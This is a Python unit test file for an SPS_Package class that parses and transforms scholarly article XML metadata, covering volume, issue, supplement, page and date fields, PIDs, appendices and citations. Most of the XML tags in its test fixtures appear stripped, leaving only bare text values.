self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_fpage(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("fpage", "fpage"), ("lpage", "lpage"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_package_name_vol_fpage(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-fpage-lpage" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_NumFpageLpage(unittest.TestCase): def setUp(self): article_meta_xml = """5 fpage lpage """ self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_num_fpage(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("issue", "05"), ("fpage", "fpage"), ("lpage", "lpage"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_package_name_num_fpage(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-05-fpage-lpage" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_VolNumSpeFpageLpage(unittest.TestCase): def setUp(self): article_meta_xml 
= """volume 5 spe fpage lpage """ self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_num_spe_fpage(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("issue", "05-spe"), ("fpage", "fpage"), ("lpage", "lpage"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_supplement(self): self.assertEqual(self.sps_package.supplement, None) def test_number(self): self.assertEqual(self.sps_package.number, "5spe") def test_package_name_vol_num_spe_fpage(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-05-spe-fpage-lpage" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_VolSpeNumFpageLpage(unittest.TestCase): def setUp(self): article_meta_xml = """volume spe num fpage lpage """ self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_spe_num_fpage(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("issue", "spenum"), ("fpage", "fpage"), ("lpage", "lpage"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_package_name_vol_spe_num_fpage(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-spenum-fpage-lpage" ) def test_number(self): self.assertEqual(self.sps_package.number, "spenum") def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_VolSpeFpageLpage(unittest.TestCase): def setUp(self): article_meta_xml = """volume Especial fpage lpage """ self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_spe_fpage(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("issue", "spe"), ("fpage", "fpage"), ("lpage", "lpage"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_package_name_vol_spe_fpage(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-spe-fpage-lpage" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_VolSuplFpageLpage(unittest.TestCase): def setUp(self): article_meta_xml = """volume Suplemento fpage lpage """ self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_suppl_fpage(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("issue", "s0"), ("fpage", "fpage"), ("lpage", "lpage"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_supplement(self): self.assertEqual(self.sps_package.supplement, "0") def test_number(self): self.assertIsNone(self.sps_package.number) def test_package_name_vol_suppl_fpage(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-s0-fpage-lpage" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def 
test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_VolSuplAFpageLpage(unittest.TestCase): def setUp(self): article_meta_xml = """volume Suplemento A fpage lpage """ self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_suppl_a_fpage(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("issue", "sa"), ("fpage", "fpage"), ("lpage", "lpage"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_supplement(self): self.assertEqual(self.sps_package.supplement, "A") def test_number(self): self.assertIsNone(self.sps_package.number) def test_package_name_vol_suppl_a_fpage(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-sa-fpage-lpage" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_VolSuplSpeFpageLpage(unittest.TestCase): def setUp(self): article_meta_xml = """volume Suplemento spe fpage lpage """ self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_suppl_a_fpage(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("issue", "sspe"), ("fpage", "fpage"), ("lpage", "lpage"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_supplement(self): self.assertEqual(self.sps_package.supplement, "spe") def test_number(self): self.assertIsNone(self.sps_package.number) def test_package_name_vol_suppl_a_fpage(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-sspe-fpage-lpage" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_VolNumSuplFpageLpage(unittest.TestCase): def setUp(self): article_meta_xml = """volume 2 Suplemento fpage lpage """ self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_num_suppl_fpage(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("issue", "02-s0"), ("fpage", "fpage"), ("lpage", "lpage"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_supplement(self): self.assertEqual(self.sps_package.supplement, "0") def test_number(self): self.assertEqual(self.sps_package.number, "2") def test_package_name_vol_num_suppl_fpage(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-02-s0-fpage-lpage" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_Vol2SuplAFpageLpage(unittest.TestCase): def setUp(self): article_meta_xml = """volume 2 Suplemento A fpage lpage """ self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_num_suppl_a_fpage(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("issue", "02-sa"), ("fpage", "fpage"), ("lpage", "lpage"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", 
"S0074-02761962000200006"), ("other", "00006"), ], ) def test_package_name_vol_num_suppl_a_fpage(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-02-sa-fpage-lpage" ) def test_documents_bundle_id(self): self.assertEqual( self.sps_package.documents_bundle_id, "1234-5678-acron-2010-volume-02-sa" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_Vol5Elocation(unittest.TestCase): def setUp(self): article_meta_xml = """volume 5 elocation""" self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_num_continuous_publication(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("issue", "05"), ("elocation-id", "elocation"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_package_name_vol_num_continuous_publication(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-05-elocation" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, True) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_VolElocation(unittest.TestCase): def setUp(self): article_meta_xml = """volume elocation""" self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_continuous_publication(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("elocation-id", "elocation"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_package_name_vol_continuous_publication(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-elocation" ) def test_documents_bundle_id(self): self.assertEqual( self.sps_package.documents_bundle_id, "1234-5678-acron-2010-volume" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, True) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_Aop_HTML(unittest.TestCase): def setUp(self): article_meta_xml = """0 00""" self.sps_package = sps_package(article_meta_xml, doi="") def test_parse_article_meta_aop(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("year", "2010"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_package_name_aop(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-ahead-2010-00006" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, True) def test_is_ahead_of_print_true(self): self.assertTrue(self.sps_package.is_ahead_of_print) class Test_SPS_Package_Aop_XML(unittest.TestCase): def setUp(self): self.sps_package = sps_package("") def test_parse_article_meta_aop(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_package_name_aop(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-ahead-2010-S0074-02761962000200006", ) def test_documents_bundle_id(self): self.assertEqual(self.sps_package.documents_bundle_id, "1234-5678-acron-aop") def 
test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, True) def test_is_ahead_of_print_true(self): self.assertTrue(self.sps_package.is_ahead_of_print) class Test_SPS_Package_Article_HTML(unittest.TestCase): def setUp(self): article_meta_xml = """200 00""" self.sps_package = sps_package(article_meta_xml, doi="") def test_parse_article_meta(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "20"), ("year", "2010"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_supplement(self): self.assertEqual(self.sps_package.supplement, None) def test_number(self): self.assertEqual(self.sps_package.number, None) def test_package_name(self): self.assertEqual(self.sps_package.package_name, "1234-5678-acron-20-00006") def test_documents_bundle_id(self): self.assertEqual( self.sps_package.documents_bundle_id, "1234-5678-acron-2010-20" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_ArticleMetaCount(unittest.TestCase): def setUp(self): xml = """
TEXTO
""" xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree, None) def test__transform_article_meta_count(self): result = self.sps_package.transform_article_meta_count() self.assertIsNone(result.find(".//counts")) class Test_ArticleMetaPublisherId(unittest.TestCase): def setUp(self): article_meta_xml = """
""" article_ids = """ S0074-02761962000200006 00006 """ xml = utils.build_xml(article_meta_xml, "", article_ids=article_ids) xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree) def test_publisher_id(self): self.assertEqual(self.sps_package.publisher_id, "S0074-02761962000200006") class Test_ArticleMetaNoPublisherId(unittest.TestCase): def setUp(self): article_meta_xml = """
""" article_ids = """ 00006 """ xml = utils.build_xml(article_meta_xml, "", article_ids=article_ids) xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree) def test_publisher_id(self): self.assertIsNone(self.sps_package.publisher_id) class Test_ArticleMetaAOPPID(unittest.TestCase): def setUp(self): article_meta_xml = """
""" article_ids = """ S0074-02761962000200006 S0074-02761962005000001 00006 """ xml = utils.build_xml(article_meta_xml, "", article_ids=article_ids) xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree) def test_aop_pid(self): self.assertEqual(self.sps_package.aop_pid, "S0074-02761962005000001") def test_change_aop_pid(self): self.sps_package.aop_pid = "S0074-02761962005000001" self.assertEqual(self.sps_package.aop_pid, "S0074-02761962005000001") class Test_ArticleMetaNoAOPPID(unittest.TestCase): def setUp(self): article_meta_xml = """
""" article_ids = """ S0074-02761962000200006 00006 """ xml = utils.build_xml(article_meta_xml, "", article_ids=article_ids) xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree) def test_aop_pid(self): self.assertIsNone(self.sps_package.aop_pid) def test_set_aop_pid(self): self.sps_package.aop_pid = "S0074-02761962005000001" self.assertEqual(self.sps_package.aop_pid, "S0074-02761962005000001") class Test_ArticleMetaScieloPIDV1(unittest.TestCase): def setUp(self): article_meta_xml = """
""" article_ids = """ 12345(1995) 00006 """ xml = utils.build_xml(article_meta_xml, "", article_ids=article_ids) xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree) def test_scielo_pid_v1(self): self.assertIsNotNone(self.sps_package.scielo_pid_v1) self.assertEqual(self.sps_package.scielo_pid_v1, "12345(1995)") def test_set_scielo_pid_v1(self): self.sps_package.scielo_pid_v1 = "1234-5678(1995)0001" self.assertEqual(self.sps_package.scielo_pid_v1, "1234-5678(1995)0001") class Test_ArticleMetaNoPIDScieloV1(unittest.TestCase): def setUp(self): article_meta_xml = """
""" article_ids = """ S0101-02022011009000001 00006 """ xml = utils.build_xml(article_meta_xml, "", article_ids=article_ids) xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree) def test_scielo_pid_v1(self): self.assertIsNone(self.sps_package.scielo_pid_v1) class Test_ArticleMetaPIDScieloV2(unittest.TestCase): def setUp(self): article_meta_xml = """
""" article_ids = """ S0101-02022011009000001 00006 """ xml = utils.build_xml(article_meta_xml, "", article_ids=article_ids) xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree) def test_scielo_pid_v2(self): self.assertIsNotNone(self.sps_package.scielo_pid_v2) self.assertEqual(self.sps_package.scielo_pid_v2, "S0101-02022011009000001") def test_set_scielo_pid_v2(self): self.sps_package.scielo_pid_v2 = "S0101-02022011009000001" self.assertEqual(self.sps_package.scielo_pid_v2, "S0101-02022011009000001") class Test_ArticleMetaNoPIDScieloV2(unittest.TestCase): def setUp(self): article_meta_xml = """
""" article_ids = """ 12345(1995) 00006 """ xml = utils.build_xml(article_meta_xml, "", article_ids=article_ids) xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree) def test_scielo_pid_v2(self): self.assertIsNone(self.sps_package.scielo_pid_v2) class Test_ArticleMetaPIDScieloV3(unittest.TestCase): def setUp(self): article_meta_xml = """
""" article_ids = """ cdmqrXxyd3DRjr88hpGQPLx 00006 """ xml = utils.build_xml(article_meta_xml, "", article_ids=article_ids) xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree) def test_scielo_pid_v3(self): self.assertIsNotNone(self.sps_package.scielo_pid_v3) self.assertEqual(self.sps_package.scielo_pid_v3, "cdmqrXxyd3DRjr88hpGQPLx") def test_set_scielo_pid_v3(self): self.sps_package.scielo_pid_v3 = "cdmqrXxyd3DRjr88hpGQ123" self.assertEqual(self.sps_package.scielo_pid_v3, "cdmqrXxyd3DRjr88hpGQ123") class Test_ArticleMetaNoPIDScieloV3(unittest.TestCase): def setUp(self): article_meta_xml = """
""" article_ids = """ S0101-02022011009000001 00006 """ xml = utils.build_xml(article_meta_xml, "", article_ids=article_ids) xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree) def test_scielo_pid_v3(self): self.assertIsNone(self.sps_package.scielo_pid_v3) class Test_DocumentPubdateSPS1_9(unittest.TestCase): def setUp(self): self.xml = """
201223
""" xmltree = etree.fromstring(self.xml) self.sps_package = SPS_Package(xmltree, None) def test_document_pubdate(self): self.assertEqual(self.sps_package.document_pubdate, ("", "", "")) def test_set_document_pubdate(self): self.sps_package.document_pubdate = ("2010", "07", "20") self.assertEqual(self.sps_package.document_pubdate, ("2010", "07", "20")) def test_set_incomplete_document_pubdate(self): self.sps_package.document_pubdate = ("2010", "", "") self.assertEqual(self.sps_package.document_pubdate, ("2010", "", "")) class Test_DocumentPubdateSPS1_8(unittest.TestCase): def setUp(self): self.xml = """
201223
""" xmltree = etree.fromstring(self.xml) self.sps_package = SPS_Package(xmltree, None) def test_document_pubdate(self): self.assertEqual(self.sps_package.document_pubdate, ("2012", "02", "03")) def test_set_document_pubdate(self): self.sps_package.document_pubdate = ("2010", "07", "20") self.assertEqual(self.sps_package.document_pubdate, ("2010", "07", "20")) def test_set_incomplete_document_pubdate(self): self.sps_package.document_pubdate = ("2010", "", "") self.assertEqual(self.sps_package.document_pubdate, ("2010", "", "")) class Test_DocumentPubdateSPS1_4(unittest.TestCase): def setUp(self): self.xml = """
20122
""" xmltree = etree.fromstring(self.xml) self.sps_package = SPS_Package(xmltree, None) def test_document_pubdate(self): self.assertEqual(self.sps_package.document_pubdate, ("2012", "02", "")) def test_set_document_pubdate(self): self.sps_package.document_pubdate = ("2010", "07", "20") self.assertEqual(self.sps_package.document_pubdate, ("2010", "07", "20")) def test_set_incomplete_document_pubdate(self): self.sps_package.document_pubdate = ("2010", "", "") self.assertEqual(self.sps_package.document_pubdate, ("2010", "", "")) class Test_DocumentsBundlePubdateSPS1_9(unittest.TestCase): def setUp(self): self.xml = """
2010513
""" xmltree = etree.fromstring(self.xml) self.sps_package = SPS_Package(xmltree, None) def test_documents_bundle_pubdate(self): self.assertEqual(self.sps_package.documents_bundle_pubdate, ("", "", "")) def test_set_documents_bundle_pubdate(self): self.sps_package.documents_bundle_pubdate = ("2012", "10", "21") self.assertEqual(self.sps_package.documents_bundle_pubdate, ("2012", "10", "21")) def test_set_incomplete_documents_bundle_pubdate(self): self.sps_package.documents_bundle_pubdate = ("2012", "", "") self.assertEqual(self.sps_package.documents_bundle_pubdate, ("2012", "", "")) def test_set_documents_bundle_pubdate_to_none(self): self.xml = """
20105
""" xmltree = etree.fromstring(self.xml) self.sps_package = SPS_Package(xmltree, None) self.sps_package.documents_bundle_pubdate = None self.assertEqual(self.sps_package.documents_bundle_pubdate, ("", "", "")) class Test_DocumentsBundlePubdateSPS1_8(unittest.TestCase): def setUp(self): self.xml = """
2010513
""" xmltree = etree.fromstring(self.xml) self.sps_package = SPS_Package(xmltree, None) def test_documents_bundle_pubdate(self): self.assertEqual(self.sps_package.documents_bundle_pubdate, ("", "", "")) def test_set_documents_bundle_pubdate(self): self.sps_package.documents_bundle_pubdate = ("2012", "10", "21") self.assertEqual(self.sps_package.documents_bundle_pubdate, ("2012", "10", "21")) def test_set_incomplete_documents_bundle_pubdate(self): self.sps_package.documents_bundle_pubdate = ("2012", "", "") self.assertEqual(self.sps_package.documents_bundle_pubdate, ("2012", "", "")) def test_set_documents_bundle_pubdate_to_none(self): self.xml = """
20105
""" xmltree = etree.fromstring(self.xml) self.sps_package = SPS_Package(xmltree, None) self.sps_package.documents_bundle_pubdate = None self.assertEqual(self.sps_package.documents_bundle_pubdate, ("", "", "")) class Test_DocumentsBundlePubdateSPS1_4(unittest.TestCase): def setUp(self): self.xml = """
2010513
""" xmltree = etree.fromstring(self.xml) self.sps_package = SPS_Package(xmltree, None) def test_documents_bundle_pubdate(self): self.assertEqual(self.sps_package.documents_bundle_pubdate, ("", "", "")) def test_set_documents_bundle_pubdate(self): self.sps_package.documents_bundle_pubdate = ("2012", "10", "21") self.assertEqual(self.sps_package.documents_bundle_pubdate, ("2012", "10", "21")) def test_set_incomplete_documents_bundle_pubdate(self): self.sps_package.documents_bundle_pubdate = ("2012", "", "") self.assertEqual(self.sps_package.documents_bundle_pubdate, ("2012", "", "")) def test_set_documents_bundle_pubdate_to_none(self): self.xml = """
20105
""" xmltree = etree.fromstring(self.xml) self.sps_package = SPS_Package(xmltree, None) self.sps_package.documents_bundle_pubdate = None self.assertEqual(self.sps_package.documents_bundle_pubdate, ("", "", "")) @mock.patch( "documentstore_migracao.export.sps_package.SPS_Package._move_appendix_from_body_to_back" ) @mock.patch( "documentstore_migracao.export.sps_package.SPS_Package.transform_pubdate" ) class TestTransformContent(unittest.TestCase): def setUp(self): self.xml = """

""" xmltree = etree.fromstring(self.xml) self.app_ids = [f"anx0{num}" for num in range(1, 3)] self.sps_package = SPS_Package(xmltree, None) self.body = self.sps_package.xmltree.find("./body") self.back = self.sps_package.xmltree.find("./back") def test_calls_transform_pubdate( self, mk_transform_pubdate, mk_sps_package_move_appedix ): self.sps_package.transform_content() mk_transform_pubdate.assert_called_once() def test_calls_moves_appendix_from_body_to_back( self, mk_transform_pubdate, mk_sps_package_move_appedix ): self.sps_package.transform_content() mk_sps_package_move_appedix.assert_called_once() class TestCompletePubDate(unittest.TestCase): def setUp(self): self.xml = """
S0074-02761962000200006 {volume} {issue} {pub_date_collection} {pub_date_pub}
""" def test_adds_document_pubdate_if_date_not_in_xml(self): volume = "50" issue = "1" pub_date_collection = """ 2010 """ xml_txt = self.xml.format( volume=volume, issue=issue, pub_date_collection=pub_date_collection, pub_date_pub="", ) xmltree = etree.fromstring(xml_txt) xml_sps = SPS_Package(xmltree, None) xml_sps.complete_pub_date(("2020", "01", "24"), None) self.assertEqual(xml_sps.document_pubdate, ("2020", "01", "24")) self.assertEqual(xml_sps.documents_bundle_pubdate, ("2010", "", "")) def test_does_not_change_document_pubdate_if_document_pubdate_is_none(self): volume = "50" issue = "1" pub_date_collection = """ 2010 """ xml_txt = self.xml.format( volume=volume, issue=issue, pub_date_collection=pub_date_collection, pub_date_pub="", ) xmltree = etree.fromstring(xml_txt) xml_sps = SPS_Package(xmltree, None) xml_sps.complete_pub_date(None, None) self.assertEqual(xml_sps.document_pubdate, ("", "", "")) self.assertEqual(xml_sps.documents_bundle_pubdate, ("2010", "", "")) def test_fixes_bundle_pubdate_if_it_is_aop(self): pub_date_collection = """ 2010513 """ xml_txt = self.xml.format( volume="", issue="", pub_date_collection=pub_date_collection, pub_date_pub="", ) xmltree = etree.fromstring(xml_txt) xml_sps = SPS_Package(xmltree, None) xml_sps.complete_pub_date(("2020", "01", "24"), ("1997", "03", "")) self.assertEqual(xml_sps.document_pubdate, ("2020", "01", "24")) self.assertEqual(xml_sps.documents_bundle_pubdate, ("", "", "")) def test_adds_bundle_pubdate_if_date_not_in_xml(self): volume = "50" issue = "1" pub_date_pub = """ 2010513 """ xml_txt = self.xml.format( volume=volume, issue=issue, pub_date_collection="", pub_date_pub=pub_date_pub, ) xmltree = etree.fromstring(xml_txt) xml_sps = SPS_Package(xmltree, None) xml_sps.complete_pub_date(("2010", "05", "13"), ("1997", "03", "")) self.assertEqual(xml_sps.document_pubdate, ("2010", "05", "13")) self.assertEqual(xml_sps.documents_bundle_pubdate, ("1997", "03", "")) class TestOriginalLanguage(unittest.TestCase): def setUp(self): self.xml = """{article_tag} S0074-02761962000200006 """ def test_returns_none_if_lang_attr_not_set(self): article_tag = '
'
        xml_txt = self.xml.format(article_tag=article_tag)
        xmltree = etree.fromstring(xml_txt)
        xml_sps = SPS_Package(xmltree)
        self.assertIsNone(xml_sps.original_language)

    def test_returns_lang_if_it_is_set(self):
        article_tag = '
'
        xml_txt = self.xml.format(article_tag=article_tag)
        xmltree = etree.fromstring(xml_txt)
        xml_sps = SPS_Package(xmltree)
        self.assertEqual(xml_sps.original_language, "pt")

    def test_sets_value(self):
        article_tag = '
'
        xml_txt = self.xml.format(article_tag=article_tag)
        xmltree = etree.fromstring(xml_txt)
        xml_sps = SPS_Package(xmltree)
        xml_sps.original_language = "en"
        self.assertEqual(xml_sps.original_language, "en")


class TestMoveAppendixFromBodyToBack(unittest.TestCase):
    def setUp(self):
        self.xml = """

""" xmltree = etree.fromstring(self.xml) self.app_ids = [f"anx0{num}" for num in range(1, 3)] self.sps_package = SPS_Package(xmltree, None) def test_body_without_appedix(self): self.sps_package._move_appendix_from_body_to_back() self.assertEqual(len(self.sps_package.xmltree.findall("./body//app-group")), 0) def test_back_with_appedix(self): self.sps_package._move_appendix_from_body_to_back() app_group_tags = self.sps_package.xmltree.findall(".//back//app-group") self.assertEqual(len(app_group_tags), 2) for app_group_tag in app_group_tags: self.assertIn(app_group_tag.find("app").attrib["id"], self.app_ids) class TestMoveAppendixFromBodyToBackWithSubArticle(unittest.TestCase): def setUp(self): self.xml = """

""" xmltree = etree.fromstring(self.xml) self.app_ids = [f"anx0{num}" for num in range(1, 5)] self.sps_package = SPS_Package(xmltree, None) def test_from_body_to_back_article_data(self): self.sps_package._move_appendix_from_body_to_back() self.assertEqual(len(self.sps_package.xmltree.findall("./body//app-group")), 0) app_group_tags = self.sps_package.xmltree.findall("./back//app-group") self.assertEqual(len(app_group_tags), 2) for app_group_tag in app_group_tags: self.assertIn(app_group_tag.find("app").attrib["id"], self.app_ids[:2]) def test_from_body_to_back_sub_article_data(self): self.sps_package._move_appendix_from_body_to_back() self.assertEqual( len(self.sps_package.xmltree.findall("./sub-article//body//app-group")), 0 ) app_group_tags = self.sps_package.xmltree.findall( "./sub-article//back//app-group" ) self.assertEqual(len(app_group_tags), 2) for app_group_tag in app_group_tags: self.assertIn(app_group_tag.find("app").attrib["id"], self.app_ids[2:]) class TestMoveAppendixFromBodyToBackWithSubArticleAndBacks(unittest.TestCase): def setUp(self): self.xml = """

Article Title

""" xmltree = etree.fromstring(self.xml) self.app_ids = [f"anx0{num}" for num in range(1, 5)] self.sps_package = SPS_Package(xmltree, None) def test_from_body_to_back_article_data(self): self.sps_package._move_appendix_from_body_to_back() self.assertEqual(len(self.sps_package.xmltree.findall("./body//app-group")), 0) app_group_tags = self.sps_package.xmltree.findall("./back//app-group") self.assertEqual(len(app_group_tags), 2) for app_group_tag in app_group_tags: self.assertIn(app_group_tag.find("app").attrib["id"], self.app_ids[:2]) def test_from_body_to_back_sub_article_data(self): self.sps_package._move_appendix_from_body_to_back() self.assertEqual( len(self.sps_package.xmltree.findall("./sub-article//body//app-group")), 0 ) app_group_tags = self.sps_package.xmltree.findall( "./sub-article//back//app-group" ) self.assertEqual(len(app_group_tags), 2) for app_group_tag in app_group_tags: self.assertIn(app_group_tag.find("app").attrib["id"], self.app_ids[2:]) class TestUpdateMixedCitations(unittest.TestCase): def setUp(self): xml = """
Old mixed-citation
""" self.package = SPS_Package(etree.fromstring(xml)) self.references = { "1": "1. New mixed-citation", "2": "2 Updated mixed-citation", } def test_should_add_mixed_when_element_is_missing(self): self.package.update_mixed_citations(self.references) self.assertIn(b"", etree.tostring(self.package.xmltree)) self.assertIn( b"1. New mixed-citation", etree.tostring(self.package.xmltree), ) def test_should_not_update_an_existing_mixed_citation_if_override_is_false(self): self.package.update_mixed_citations(self.references) self.assertNotIn(b"", etree.tostring(self.package.xmltree)) self.assertIn( b"Old mixed-citation", etree.tostring(self.package.xmltree), ) def test_should_update_an_existing_mixed_citation_if_override_is_true(self): self.package.update_mixed_citations(self.references, override=True) self.assertIn(b"", etree.tostring(self.package.xmltree)) self.assertNotIn( b"Old mixed-citation", etree.tostring(self.package.xmltree), ) self.assertIn( b"2 Updated mixed-citation", etree.tostring(self.package.xmltree), ) def test_should_convert_html_tags_to_jats_tags(self): self.references["1"] = "text text" self.package.update_mixed_citations(self.references) self.assertIn( b"text text", etree.tostring(self.package.xmltree), ) def test_should_not_update_the_mixed_citations_if_the_references_dict_have_wrong_indexes( self ): self.package.update_mixed_citations({"10": "New mixed-citation"}) self.assertNotIn( b"New mixed-citation", etree.tostring(self.package.xmltree), ) def test_should_not_update_the_label_tag_when_extracted_number_does_not_match_with_order_number( self ): references = {"1": "Reference without label"} self.package.update_mixed_citations(references) self.assertIn( b"Reference without label", etree.tostring(self.package.xmltree), ) self.assertNotIn(b"", etree.tostring(self.package.xmltree)) class TestGetRefItems(unittest.TestCase): def _get_sps_package(self, text): return SPS_Package(etree.fromstring(text), None) def test__get_ref_items_returns_ref_list_three_ref_items(self): text = """
1 2 3
""" xml = etree.fromstring(text) body = xml.find(".//body") _sps_package = self._get_sps_package(text) ref_items = _sps_package._get_ref_items(body) self.assertEqual(ref_items[0].text, "1") self.assertEqual(ref_items[1].text, "2") self.assertEqual(ref_items[2].text, "3") def test__get_ref_items_returns_subarticle_ref_list_ref_items(self): text = """
1 2 3
""" xml = etree.fromstring(text) body = xml.find(".//sub-article/body") _sps_package = self._get_sps_package(text) ref_items = _sps_package._get_ref_items(body) self.assertEqual(len(ref_items), 3) class Test_SPS_Package_Order(unittest.TestCase): article_xml = """
{}
